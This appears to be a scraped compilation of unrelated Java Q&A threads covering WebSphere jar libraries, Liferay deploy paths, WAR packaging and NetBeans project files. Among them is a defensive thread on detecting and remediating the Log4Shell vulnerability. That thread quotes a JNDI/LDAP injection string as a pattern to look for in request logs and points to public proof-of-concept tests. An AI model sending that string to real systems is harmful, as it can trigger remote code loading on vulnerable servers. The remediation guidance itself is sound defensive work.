How do I add/remove jar files to the WebSphere Application Server v7.0 library? It's not the 'Edit' button. I placed some new jar files in {WAS_HOME}/runtimes/base_v7plugins/ hoping they would be picked up on the next restart, but it didn't happen.
I believe IBM does not support using WAS product jar files in to the 3rd party tool. However if you can give me some more details what exactly this tool is ? and what exactly you are trying to do ?
You should not be copying all the jars file from plugins folder .
Only jar files that you can use on the client side from WAS product is from /WAS_HOME/runtimes folder.
Hope this helps.
-VT
Note: These opinions are my own .
Related
Recently there was a log4j vulnerability reported:
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
https://www.randori.com/blog/cve-2021-44228/
https://www.lunasec.io/docs/blog/log4j-zero-day/
How do I know exactly my system has been attacked or exploited by injected arbitrary code?
Thank you so much
UPDATE: 2021-12-18...
Remember to always check for the latest information from the resources listed below
CVE-2021-45105... 2.16.0 and 2.12.2 are no longer valid remediations! The current fixing versions are 2.17.0 (Java 8) and 2.12.3 (Java 7). All other Java versions have to take the stop gap approach (removing/deleting JndiLookup.class file from the log4j-core JAR.
I have updated my message below accordingly.
Answering the question directly:
Reddit thread: log4j_0day_being_exploited has SEVERAL resources that can help you.
To detect vulnerability
cntl + f for Vendor Advisories. Check those lists to see if you are running any of that software. If you are and an update is available for it, update.
THEN cntl + f for .class and .jar recursive hunter. Run the program there, if it finds anything remediate.
You can also cntl + f for Vulnerability Detection if you want to perform a manual active test of your systems for the vulnerability
To detect exploit... this is more complex and all I do is is till you
cntl + f for Vendor Advisories... search through the stuff there... not sure which option will be best for you
More resources
https://www.reddit.com/r/blueteamsec/comments/rd38z9/log4j_0day_being_exploited/
This one has TONS of useful info including detectors, even more resource links, very easy to understand remediation steps, and more
https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance
https://github.com/cisagov/log4j-affected-db
https://logging.apache.org/log4j/2.x/security.html
Remediation:
CVE-2021-45046 ... CVE-2021-44228 ... CVE-2021-45105
While most people that need to know probably already know enough to do what they need to do, I thought I would still put this just in case...
Follow the guidance in those resources... it may change, but
As of 2021-12-18
It's basically
Remove log4j-core JAR files if possible
From both running machines for immediate fix AND
in your source code / source code management files to prevent future builds / releases / deployments from overwriting the change
If that is not possible (due to a dependency), upgrade them
If you are running Java8, then you can upgrade to log4j 2.17.0+
If you are running an earlier version of Java, then you can upgrade to log4j 2.12.3
If you are running an older version of Java, then you need to upgrade to the newest version of Java, and then use the newest version of Log4J
Again, these changes have to happen both on running machine and in code
If neither of those are possible for some reason... then there is the NON-remediation stop gap of removing the JndiLookup.class file from the log4j-core JARs.
There is a one-liner for the stop gap option on Linux using the zip command that comes packaged with most Linux distros by default.
zip -q -d "$LOG4J_JAR_PATH" org/apache/logging/log4j/core/lookup/JndiLookup.class
At time of writing, most of the guides online for the stop gap option on Windows say to do the following (again... assuming you can't do one of the remove JAR or upgrade options above):
Install something like 7-zip
Locate all of your log4j-core JAR files and for each one do the following...
Rename the JAR to change the extension to .zip
Use 7-zip to unzip the JAR (which now has a .zip extension)
Locate and remove the JndiLookup.class file from the unzipped folder
The path is \\path\\to\\unzippedFolder\\org\\apache\\logging\\log4j\\core\\lookup\\JndiLookup.class
Delete the old JAR file (which now has an extension of .zip)
Use 7-zip to RE-zip the folder
Rename the new .zip folder to change the extension to .jar
There are also some options to use Power Shell
Reddit thread: log4j_0day_being_exploited
ctrl+f for "PowerShell"
This is fine if you only have 1 or 2 JAR files to deal with and you don't mind installing 7-zip or you have PowerShell available to do it. However, if you have lots of JAR files, or if you don't want to install 7-zip and don't have access to Power Shell, I created an open-source VBS script that will do it for you without needing to install any additional software. https://github.com/CrazyKidJack/Windowslog4jClassRemover
Read the README and the Release Notes https://github.com/CrazyKidJack/Windowslog4jClassRemover/releases/latest
You can check on your request log if you see something looking like this :
{jndi:ldap://example.com:1234/callback}
If you want to check if you can be attacked, you can run a POC from Github. This link seems to be the first POC released. You can now find others.
You can also find a black-box testing here.
I've downloaded a file from github(cloned it as well as downloaded it as a zip).
Here is the adress: https://github.com/bargenson/RMT .
I would like to open it to work with it and understand how the author used jsf, validation beans since I have some homework to do.
But my Netbeans (IDE 8.0.2) won't find any project in that file.
So I can't run it and debug it.
EDIT : After unzipping the file, I can't find any project to open in my IDE:
Can you guys help me understand how I can make this work?
Thanks!
The project you linked does not provide the metadata of a netbeans project¹. That means that either the original developer did use some different IDE (or no IDE at all) or that he did not choose to include said metadata into the repository.
You should be able to create a new free-form project from the build.xml within the project directory (after extracting the archive you downloaded). If you only wish to run specific code, you can also directly build the project from shell using ant.
¹ NetBeans uses a nbproject folder within each project's directory to track NetBeans-specific information, such as the mapping of the IDE's run and debug button to actual features of the project.
Try to unzip it. That should work.
For anyone having the same issue, I've finally found out that you can run this kind of project by creating a new project "with existing sources".
It worked perfectyl :)
Working with liferay and portlets from last 3 weeks.
I downloaded the bundled liferay server and placed it on my local drive.
I did the set up and was able to access localhost:8080 properly.
I also created some custom portlets and when build them in eclipse the war files were getting deployed in the path C:/liferay/deploy.
Now, I changed the server location, I wanted to have the server in D:/ drive.
When I did the transition, started the tomcat server from D:/liferay/tomcat/bin/startup.bat
and then build the project, the war files are still building in c:/ drive.
When I copy the war file manually from c:/liferay/deploy to D:/liferay/deploy it gets deployed successfully.
I want the war file to be created directly in the d:/liferay/deploy folder.
Can someone help me understand what all changes do i need to do here?
If you are using Liferay plugin sdk then there would be file named as
build.<userid>.properties
in your plugin sdk.Change the below properties as per new configuration and give a try
app.server.portal.dir
app.server.lib.portal.dir
app.server.lib.global.dir
app.server.deploy.dir
auto.deploy.dir
Currently I am working on a GWTP application. While deploying to application server I remove all the jar files from the application.war file and then I push the war to webapps. I have put all the jars in the application server lib directory. The application works fine. I just have to know, can we remove all the jars from WEB-INF/lib of war file. Is this approach right? please let me know.
And also I have another question. I manually remove the jar files from the created war file which got created using ant. Please give me examples to automatically remove jars from build.xml.
I see only disadvantages from this approach:
If you want to run another application on your server which use an other version of a library, you can't.
Each time you update a jar in you dev environment, you will need to manually copy it to your server lib/ directory instead of having it automatically packaged.
Why having them in WEB-INF/lib bothers you?
I'm using netbeans and maven in my project and for JSF configuration files it generates some .NavData files.
This bothers me during backing up my project and also is inconvenient for versioning systems.
How can i configure to use another folder for these files, e.g. target would be awesome.
Any ideas?
Thx.
These files are generated by plugins or specific editors of the IDE (NetBeans or Eclipse for example). They starts with a . in order to be hidden in Linux file systems.
I am pretty sure that you cannot change the directory where they are located, so the best solution is to add them in the .cvsignore or .svnignore or .gitignore file (depending on which Version Control System you are using). So these files will ignored during the VCS synchronization.